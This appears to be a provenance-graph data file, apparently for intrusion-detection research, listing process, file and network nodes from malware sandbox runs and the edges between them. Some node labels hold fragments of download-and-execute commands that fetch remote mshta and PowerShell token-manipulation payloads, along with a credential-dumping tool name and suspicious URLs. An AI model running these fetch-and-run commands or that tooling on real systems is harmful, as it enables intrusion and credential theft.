31
MP-ns958E.tmp 
SO-https://gmail.us21.list-manage.com/track/click?u=c5edbce8886c368c0f6288564&id=20a3994999&e=e4fa9352f9
TP-AppLaunch.exe
MP-pypykatz.py
TF-\Users\admin\AppData\Local\Temp\nscB9BA.tmp\nsCFA0.tmp
MP-schtasks.exe
MP-CCleanerBugReport.exe
MF-00027.pdf
SO-http://gc2siv9geletsu4.orgweave.com/bXRpQG10aS5odQ
SF-C:\Users\admin\AppData\Local\Temp\OriginalMessage
MP*-setup_avrokeyboard_5.6.0.exe
MP-OperaSetup_UNO.exe
SF-C:\Program Files\Mozilla Firefox\browser
MP*-jww825a.tmp 
SF-C:\Users\Public\coinmarketcap\imcq
MF-\Users\admin\AppData\Local\Temp\C3B1.exe
MP-DataSvcUtil.exe
MF-C:\Users\admin\AppData\Local\Temp\ODA
TF-\Users\admin\AppData\Local\Temp\Edge.924e4e.zip
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close
TP*-nsA19D.tmp
MF-\Windows\system32\icacls.exe
TP*-schtasks.exe 
MF-\Users\admin\AppData\Local\Temp\nsf91FB.tmp\ns9C62.tmp
MP-TBHD AWB 1ZY0W5038626871089.exe
MP-ns9A6A.tmp 
MP-jww825a.exe 
SO-https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
MF-C:\Users\Public\Videos\videotv
SF-C:\Users\admin\AppData\Local\Temp\alg
TF-\Users\admin\AppData\Local\Temp\Overbygningsuddannelsens.exe
75
0 1 ST-1
0 2 FR-1
2 1 ST-1
0 3 FR-1
1 3 RF-1
2 3 IJ-1
2 4 EX-1
3 4 UK-1
1 5 RF-1
2 5 UK-1
6 1 ST-1
6 7 WR-1
6 8 ST-1
6 9 RD-1
1 10 RF-1
10 7 EX-1
8 10 RF-1
10 9 RD-1
6 11 FR-1
11 7 RD-1
11 8 ST-1
11 9 WR-1
10 11 UK-1
6 12 EX-1
6 13 FR-1
13 7 EX-2
13 8 ST-2
13 9 CD-2
13 12 RD-2
6 14 RD-1
13 14 RD-2
6 15 WR-1
13 15 WR-2
6 16 UK-1
13 17 RD-2
13 18 RD-2
19 13 RF-2
20 12 RD-3
13 20 IJ-2
20 14 WR-3
20 15 WR-3
20 17 WR-3
20 18 WR-3
19 20 RF-3
13 21 RD-2
20 21 EX-3
22 12 RD-4
13 22 IJ-2
22 14 WR-4
22 15 WR-4
22 17 WR-4
22 18 EX-4
22 19 ST-4
20 22 IJ-3
22 21 WR-4
13 23 WR-2
20 23 RD-3
22 23 WR-4
24 14 CD-4
24 15 WR-4
24 17 RD-4
24 18 WR-4
19 24 RF-4
20 24 IJ-3
24 21 UK-4
25 15 UK-4
26 17 RD-4
26 18 WR-4
19 26 RF-4
20 26 IJ-3
22 26 UK-4
27 20 RF-3
20 28 WR-3
20 29 CD-3
20 30 RD-3

